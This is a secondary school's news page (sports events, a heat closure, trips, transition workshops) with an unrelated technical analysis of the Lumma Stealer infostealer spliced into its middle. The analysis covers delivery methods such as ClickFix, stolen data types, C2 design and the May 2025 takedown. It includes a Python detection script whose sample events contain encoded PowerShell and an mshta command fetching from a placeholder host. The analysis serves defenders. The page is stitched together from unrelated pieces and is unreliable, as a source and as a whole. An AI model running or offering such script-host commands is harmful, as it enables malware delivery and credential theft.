Dallaglio Rugbyworks Festival

The children represented the school brilliantly throughout the day, playing fantastically well as a team. Their teamwork, determination and positive attitude saw them progress all the way to the final. Unfortunately, they narrowly missed out on the trophy, but reaching the final was a tremendous achievement and one they should all be incredibly proud of.

A brilliant day was had by all, and the pupils were excellent ambassadors for our school both on and off the field. If you see any of the children involved around school, please take a moment to congratulate them on their efforts and achievements.

A special mention must go to Denise G, who was awarded a sportsmanship award by the CEO of Dallaglio Rugbyworks in recognition of her outstanding conduct and attitude throughout the matches. This is a wonderful achievement and reflects the values we strive to promote.

We should also recognise Etham Y, whose “samba feet” footwork provided some memorable moments and certainly entertained everyone watching!

Well done to all involved for a fantastic day of rugby and for representing the school so positively!! 

HOT WEATHER UPDATE

School Closure

Due to the extreme heat we will be closing at 1pm today (Wednesday 24th June). Please complete the MS form sent to all parents. 

School will be closed to all pupils: Thursday 25th June and Friday 26th June

More Information: HERE

Year 8 STEM Science Fair

Fourteen Year 8 students recently attended a STEM Science Fair, where they took part in a range of engaging workshops, interactive sessions, and hands-on activities designed to inspire future scientists, engineers, and innovators.

The day began with students exploring stalls hosted by external companies and organisations. Activities included virtual reality experiences, reaction time challenges, flight aerodynamics demonstrations, and a variety of problem-solving tasks that encouraged critical thinking and teamwork.

One of the highlights of the day was a fascinating lecture entitled How to Freeze a Human. Students learned about advances in preserving organs for transplantation and how this research could help save lives in the future. Several of our students confidently volunteered to assist during the session, demonstrating enthusiasm and a willingness to engage with complex scientific concepts.

Students also took part in a workshop led by the Air League, exploring the problem-solving skills required in aviation. Working alongside students from another school within the Matrix Trust, they completed a series of teamwork challenges that developed their communication, leadership, and analytical skills.

Throughout the day, our students impressed both the presenters and the visiting companies with their enthusiasm, resilience, and exceptional problem-solving abilities. Several members of staff commented on how brilliantly they approached challenges, with some students successfully solving problems that no other groups had managed to complete. Their maturity, teamwork, and determination were praised throughout the event.

The day concluded with a visit to the Thinktank, where students explored a variety of immersive exhibits, interactive games, and hands-on science stations.

The trip was a fantastic experience, providing valuable insight into the many opportunities available within STEM careers. Our Year 8 students were a real asset to both the school and themselves, representing the school with pride while demonstrating the confidence, curiosity, and talent that will undoubtedly support their future success.

Girls of Brum Day!

On Thursday 11th June, Miss Hart took 11 Year 7 Girls to attend the 'Girls of Brum' Day, held at the Alexander Stadium. 

Centred around empowering young girls in all areas of life, but particularly sport, the day consisted of inspirational talks from famous athletes, interactive stalls run by a range of sports organisations, youth clubs and community projects, along with an afternoon of sports workshops.

The girls had the opportunity to learn more about what is available to them in the local area and take part in sports, like cricket, golf and cycling, that they wouldn't normally take part in, and had an amazing time making friendship bracelets, getting glitter tattoos, writing positive affirmations, learning dance routines and more!

Overall, it was an amazing day to celebrate what women can do!

Year 10 Mock Interviews a Great Success

Our Year 10 students recently took part in a highly successful Mock Interview Day, with over 24 employers and industry professionals generously giving their time to support the event.

Students experienced realistic interview situations, helping them to develop their confidence, communication skills and understanding of employers’ expectations. The opportunity to receive personalised feedback from professionals was invaluable and will help them prepare for future college, apprenticeship and employment opportunities.

The employers were full of praise for our students, commenting on their enthusiasm, politeness and willingness to engage. The feedback received was overwhelmingly positive, with many highlighting the excellent attitudes and potential demonstrated by our young people.

We would like to extend our sincere thanks to all the employers who volunteered their time and expertise to make the day such a success. Their support plays a vital role in preparing our students for the world of work and inspiring their future aspirations.

British Council International School Award success for Dame Elizabeth Cadbury School

Dame Elizabeth Cadbury School in Bournville has been awarded Intermediate level of the British Council’s prestigious International School Award in recognition of its work to bring the world into the classroom.

The International School Award celebrates the achievements of schools that do exceptional work in international education. Fostering an international dimension in the curriculum is at the heart of the British Council’s work with schools so that young people gain the cultural understanding and skills they need for life and work in today’s world.

Shannon West, Head of UK Schools for the British Council, said: “Dame Elizabeth Cadbury's international work has earned the school well-deserved recognition with the British Council International School Award - Intermediate Certificate.

We are proud and delighted to work with this great school. Many thanks to everyone for all their commitment to developing international work and sharing excellent classroom practice and resources. This is enriching education for its pupils, and their excellent collaborative projects with partner schools overseas are bringing the world into their classrooms. International work is key support for developing skills young people need to be globally aware citizens of the future.

Embedding an international ethos across a school can lead to International School Award Accreditation, the highest award level. Schools looking to join this supportive and engaging global network should contact us at the British Council.”

The Award is now available worldwide in countries such as Greece, India, and Nigeria. Over 6000 International School Awards have been presented to successful schools in the UK since the scheme began in 1999.

The International School Award encourages and supports schools to develop:

  • An international ethos embedded throughout the school
  • A whole school approach to international work
  • Collaborative curriculum-based work with international partner schools
  • Year-round international activity
  • Involvement of the wider community

Year 6 Transition Workshop Supports Pupils and Families Ahead of September

We were delighted to welcome Year 6 pupils and their parents and carers to our Transition Workshop on 2nd June focused on attendance and a successful start to secondary school.

As part of our transition process, we carefully review information provided by primary schools alongside national attendance data to identify pupils who may benefit from additional support during the move to secondary school. The workshop was designed as a positive and proactive opportunity to help pupils and families feel confident, supported and prepared for September.

During the evening, parents and carers learned about the importance of strong attendance, positive routines and reading habits in supporting pupils' achievement, wellbeing and confidence. Families also explored our STRIVE values, the support available at DEC, and the wide range of enrichment and leadership opportunities that help pupils feel connected to school. We also discussed common transition challenges and how our attendance, pastoral, SEND and wellbeing teams work closely with families to provide early support where needed.

Meanwhile, Year 6 pupils spent time with our fantastic Year 10 Prefects, who answered questions, shared their experiences and helped pupils feel excited about starting secondary school. The prefects represented the school exceptionally well and many have already volunteered to support future transition events, including Induction Day.

We were incredibly pleased to receive positive feedback from parents and carers following the event. Comments included:

  • “This evening’s workshop was great. It was useful to learn about the transition period.”
  • “Lots of support available.”
  • “My child will be cared for.”
  • “You understand my worries about the transition.”
  • “My child really enjoyed his time with the Prefects who are a credit to the school.”
  • “My child really enjoyed spending time with your Year 10s.”

We would like to thank all families who attended, alongside our Year 10 Prefects and staff, for making the evening such a success. We look forward to continuing to support our incoming Year 7 pupils as they prepare for the next exciting stage of their education.

Lumma's Rise to Prominence: The Success of the MaaS Model

The landscape of cybercrime is defined by relentless evolution, but few threats demonstrate the sheer adaptability and proliferation of Lumma Stealer. Infostealers, in particular, have become the economic engine of the modern cybercrime ecosystem, moving far beyond simple credential harvesting to encompass deep system reconnaissance and wallet extraction. Recent reports indicate a staggering 369% increase in successful infostealer campaigns globally, cementing their status as a top-tier threat. Lumma, or LummaC2, stands out as a particularly sophisticated Malware-as-a-Service (MaaS) operation that has dominated dark web stealer logs, often commanding over 50% of the market share in recent quarters.

This article serves as a deep-dive technical analysis into Lumma Stealer. We will dissect its primary delivery mechanisms, meticulously examine its core capabilities and evasion techniques, map its robust Command and Control (C2) infrastructure, and conclude with concrete, actionable recommendations for security teams tasked with detection and mitigation. For IT security professionals, incident responders, and threat hunters, this analysis provides the necessary intelligence to move beyond simple signature matching and into proactive threat hunting.

Background and Rise to Prominence

Lumma Stealer first gained significant notoriety around August 2022. The malware was developed and managed by the alias "Shamel," who quickly established it as a highly profitable and stable platform for cybercriminals. Unlike bespoke malware, Lumma operates on a true MaaS model, allowing threat actors to leverage a powerful, pre-built, and constantly updated threat without needing extensive development resources.

The monetization structure is impressive, featuring tiered pricing ranging from basic access at $250 to highly customized, premium deployments exceeding $20,000. Crucially, the platform provides a full builder panel, enabling operators to customize the malware's functionality, targets, and appearance. Furthermore, the option to purchase the source code allows sophisticated groups to resell the Lumma framework, maximizing ROI. This accessibility has fueled its adoption across the entire criminal spectrum, from novice threat actors to elite groups such as Scattered Spider and Octo Tempest.

Its widespread adoption confirms its technical superiority and operational resilience. Lumma’s dominance is not merely anecdotal; its logs consistently rank among the highest volume infostealers observed across major dark web marketplaces, validating its effectiveness as a generalized credential and data harvester.

Distribution Vectors and Delivery Techniques

Lumma has moved past relying on single, predictable delivery methods. Its success is predicated on a sophisticated, multi-vector approach that ensures high reach and low friction for the victim. Each vector utilizes tailored social engineering and technical execution to achieve infection.

Phishing Emails

Phishing remains the bread and butter of Lumma’s distribution. Attackers leverage highly convincing, urgent lures—fake invoices, urgent reservation confirmations, HR policy updates, or shipping notifications—to entice victims into clicking a malicious link. A critical element of the Lumma delivery chain is the use of Traffic Direction Systems (TDS), such as Prometheus. These systems allow the threat actor to filter incoming traffic in real-time. If a victim is flagged as high-value (e.g., an executive or a system administrator), the TDS can redirect them to a specialized landing page or bypass typical defenses, ensuring the malware is delivered successfully.

Malvertising

Lumma frequently poisons search engine results and online advertisements. By injecting malicious payloads into search results for high-volume, legitimate software (e.g., "Notepad++ download," "Adobe Reader update"), the threat actors redirect users to cloned, compromised websites. These sites are often visually identical to the original and serve as the initial drop point for the Lumma executable or the trigger for a drive-by download.

Compromised Websites (Drive-by Download)

In this vector, the malware is delivered without the user needing to click anything beyond visiting the page. Threat actors inject malicious JavaScript into the source code of legitimate, high-traffic websites. Advanced Lumma deployments utilize EtherHiding, a technique where the actual malicious code is not hosted on a traditional server but is instead stored and served via a decentralized blockchain network, such as Binance Smart Chain (BSC). This makes the code highly resilient to simple domain blocking and takedown efforts.

The "ClickFix" Technique

This highly effective social engineering flow is one of Lumma’s signature methods. The infection chain proceeds as follows: The victim encounters a fake CAPTCHA, an error message, or a prompt on a malicious landing page. The user, believing they must resolve the issue, copies a malicious command string (e.g., a base64 encoded PowerShell command). The user then pastes this command into the Windows Run dialog (Win + R). Execution of this command launches a PowerShell or mshta instance, which subsequently fetches and executes the core Lumma executable, completing the infection.

Trojanized/Pirated Software

Lumma is also bundled into cracked or pirated applications. This is common in distribution channels for KMS activators, gaming cheats, and automated utilities (e.g., GitHub repos hosting Hamster Kombat automation tools). The malware is discreetly injected into the application package, allowing it to execute upon the user's first run, often without the victim realizing they have installed more than just the desired software.

Malware Capabilities & Technical Analysis

Lumma Stealer is not a simple dropper; it is a highly engineered payload designed for maximum stealth and data exfiltration. The core executable is typically written in C/C++ and utilizes inline Assembly (ASM) routines to optimize performance and evade static analysis.

Persistence & Evasion

Lumma employs multiple techniques to ensure it survives system reboots and avoids detection:

  • Obfuscation: The code is heavily obfuscated using compiler-level techniques, including LLVM transformations and complex Control Flow Flattening. This makes reverse engineering difficult by scrambling the execution path and confusing automated analysis tools.
  • Process Injection: Lumma rarely runs as a standalone process. It commonly uses process hollowing to inject its malicious code into a trusted, running system process (e.g., msbuild.exe, explorer.exe, svchost.exe). This allows the malware to inherit the process's legitimacy and evade basic process monitoring.
  • Stealth Persistence: It establishes persistence via suspicious entries in the Windows RunMRU registry keys, or by injecting itself into legitimate Windows services.

Information Stealing

The scope of data stolen is vast and dictated by a configuration file received from the C2. Lumma can be tailored to target specific data types, but its default configuration is comprehensive:

  • Browser Credentials & Cookies: Full harvesting from Chromium (Chrome, Edge), Mozilla (Firefox), and various proprietary browsers. This includes stored passwords, session cookies, and autofill data.
  • Cryptocurrency Wallets: Extraction of private keys and seed phrases from popular desktop and browser-based wallets (MetaMask, Exodus, Electrum).
  • Application Data: Data from critical business and personal applications, including 2FA extension tokens, VPN configuration files, and Telegram chat histories.
  • System & Document Metadata: Harvesting user documents (PDF, DOCX, XLSX), desktop screenshots, network configuration files, and system environment variables.

C2 Communication

Lumma features a remarkably resilient and layered C2 infrastructure:

  • Hardcoded and Dynamic C2s: The malware maintains a list of hardcoded C2 domains, ensuring that even if one is seized, communication can immediately pivot to another.
  • Fallback Mechanisms: If the primary C2 fails, Lumma possesses intelligent fallback mechanisms, routing communication through legitimate services like Steam profiles (using game API calls) and private Telegram channels.
  • Infrastructure Cloaking: The use of Cloudflare as a ubiquitous proxy service hides the true origin and geographical location of the C2 servers, complicating takedown efforts.
  • Protocol Evolution: Across different versions (v1 through v6), the C2 protocols have evolved, demonstrating constant refinement. Modern versions utilize strong encryption, typically ChaCha20, to secure the exfiltrated data stream between the victim and the C2 server, preventing passive network monitoring from revealing the stolen payload.

Notable Campaigns & the May 2025 Disruption

Lumma’s operational history is marked by continuous high-volume campaigns. For instance, an April 2025 campaign reported by Microsoft targeted Canadian organizations, demonstrating a shift toward enterprise-level deployment rather than just individual users. This campaign specifically focused on leveraging compromised corporate SharePoint sites as delivery vectors, bypassing traditional perimeter defenses.

The most significant event in Lumma's operational history was the massive collaborative takedown operation in May 2025. This effort, spearheaded by Europol, the FBI, and supported by Microsoft threat intelligence, successfully targeted the core infrastructure.

The impact of the May 2025 operation was staggering: approximately 2,300 to 2,500 domains associated with the Lumma network were seized or suspended. The central management panel, the heart of the MaaS operation, was effectively disrupted, and the primary C2 servers were reportedly wiped clean. This single operation temporarily crippled the profitability and operational capability of the Lumma ecosystem.

However, the aftermath has been complex. While the developer, Shamel, has publicly claimed recovery and the ability to relaunch the platform, law enforcement actions continue to sow distrust, noting that the administrators are already "talking" and rebuilding. This demonstrates the operational agility of the threat actors and the difficulty of achieving a permanent kill-switch against a platform like Lumma.

Detection and Mitigation Recommendations

To defend against Lumma Stealer, organizations must move beyond reactive signature updates and implement layered, behavior-based detection and proactive threat hunting. The following recommendations are critical for reducing the attack surface and neutralizing the threat.

Endpoint Detection & Response (EDR) Hunting

Threat hunters should specifically look for the following behavioral indicators:

  • Suspicious Parent/Child Process Relationships: Look for mshta.exe or PowerShell instances spawned by unexpected processes (e.g., Word, Outlook) or for processes executing without a visible command line.
  • Memory Injection: Search for processes exhibiting signs of memory injection, particularly if a legitimate process (like `explorer.exe` or `svchost.exe`) is hosting code from an unusual memory region.
  • Network Beaconing: Identify repetitive, low-volume outbound network connections to unknown external IPs, especially if the traffic is encrypted (indicating C2 communication).
  • File Artifacts: Scan for recently dropped files with suspicious names or those exhibiting high entropy (indicating packed or encrypted payloads).
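
The parent/child and command-line indicators above, together with the ClickFix flow described earlier (an encoded PowerShell or mshta command pasted into the Run dialog, which makes explorer.exe the parent), can be written as a triage rule over process-creation events. This is an added example, not code from the original article; the event field names, the sample events and the example.invalid URLs are constructed for illustration.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe"}
# Any "-e..." style switch followed by a long base64-looking argument.
ENC_FLAG = re.compile(r"(?i)\s[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")
URL = re.compile(r"(?i)\bhttps?://")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    for flag, blob in ENC_FLAG.findall(cmdline):
        flag = flag.lower()
        # PowerShell accepts prefixes of -EncodedCommand (-e, -enc, ...) and -ec;
        # -ExecutionPolicy also starts with "e" and must not match.
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                raw = base64.b64decode(blob, validate=True)
            except ValueError:
                continue  # not valid base64, keep looking
            return raw.decode("utf-16-le", errors="replace")
    return None


def classify(event):
    """Return the hunting reasons that apply to one process-creation event."""
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event.get("cmdline", "")
    reasons = []
    if image in SCRIPT_HOSTS:
        if parent in OFFICE_PARENTS:
            reasons.append("script host spawned by Office application")
        # explorer.exe is the parent of anything started from Win + R. On its own
        # that is normal, so also require encoded or remote content (heuristic).
        encoded = decode_encoded_command(cmd) is not None
        if parent == "explorer.exe" and (encoded or URL.search(cmd)):
            reasons.append("Run-dialog style launch with encoded or remote content")
    if not cmd.strip():
        reasons.append("process without a visible command line")
    return reasons


def hunt(events):
    """Return (index, reasons) for every event that matched at least one rule."""
    hits = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in hits if r]


def _enc(script):
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; the payload and URLs are harmless placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -w hidden -ExecutionPolicy Bypass -enc "
                + _enc("Write-Output 'constructed sample'")},
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/constructed.hta"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/verify"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell.exe"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Users\Public\updater.exe",
     "cmdline": ""},
]

if __name__ == "__main__":
    for index, reasons in hunt(SAMPLE_EVENTS):
        print(index, basename(SAMPLE_EVENTS[index]["image"]), reasons)
```

Decoding the encoded argument before alerting lets the analyst see what the pasted command would have run, rather than only that it was encoded.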

Strategic Defense Measures

  • Application Control: Implement whitelisting policies to ensure only approved applications can execute, blocking unknown or suspicious executables immediately.
  • Browser Isolation: Utilize browser isolation technologies to sandbox web browsing, preventing drive-by downloads from executing code directly on the host machine.
  • Email Gateway Inspection: Configure gateways to deeply inspect attachments (especially Office documents) for embedded scripts (VBA) that trigger the initial payload delivery.
  • Network Segmentation: Isolate critical assets and segment the network to prevent a successful infection on a low-value endpoint from immediately spreading laterally to the domain controllers.

In conclusion, Lumma is not merely a piece of malware; it is a highly adaptive, professionally maintained platform. Effective defense requires shifting focus from merely blocking known hashes to monitoring and understanding the behavior of the threat.

Pupils attend future Lionesses

Pupils from Dame Elizabeth Cadbury School recently had an exciting opportunity to attend a Future Lionesses football Talent ID Day, where they competed in fast-paced 3v3 games against talented players from across Birmingham. The standard of football on display was exceptional, and our four representatives rose to the occasion brilliantly, showcasing skill, determination and teamwork throughout the event.

All four pupils delivered outstanding performances, consistently impressing coaches with their technical ability and game awareness. Their efforts were recognised with a fantastic achievement: each of them has been invited to attend the next round of county trials.

A special mention goes to Alexa, who particularly caught the attention of the England coaching staff. They have expressed a strong interest in following her development more closely and are keen to stay in contact as she continues her football journey.

This is a remarkable accomplishment for all four players and a proud moment for the school. We look forward to supporting them as they take the next steps in their football pathways.

The pupils were:

  • Amelia
  • Kalsi
  • Alexa
  • Ronni

Year 9 Transition Workshop: Preparing for Success

We were delighted to welcome parents and carers to our Year 9 Transition Workshop on 17th March, focused on supporting pupils as they prepare for the move into Key Stage 4. The session explored the key changes in Year 10, including increased academic challenge, the importance of reading and vocabulary, and how strong routines and independent learning habits underpin GCSE success.

Parents also gained valuable insight into how we support pupils with exam preparation, wellbeing, and access arrangements, alongside practical strategies to support learning at home. A key message throughout the workshop was the significant impact that consistent attendance has on achievement and long-term success.

The feedback from parents and carers was overwhelmingly positive, highlighting how informative and reassuring the session was:

  • “Really helpful in understanding what Year 10 will look like and how I can support at home.”
  • “Clear, informative and gave practical advice we can use straight away.”
  • “It was reassuring to know what support is available for pupils.”

We would like to thank the parents and carers who attended. Workshops like these play an important role in strengthening the partnership between home and school, ensuring every pupil feels confident, supported, and ready for the next stage of their learning journey.

Contact Info

Woodbrooke Road, Birmingham,

West Midlands B30 1UL

Contact Number: 0121 464 4040

enquiry@decschool.co.uk

Monday - Friday: 8:00 am - 4:00 pm

Copyright 2026 © All Rights Reserved
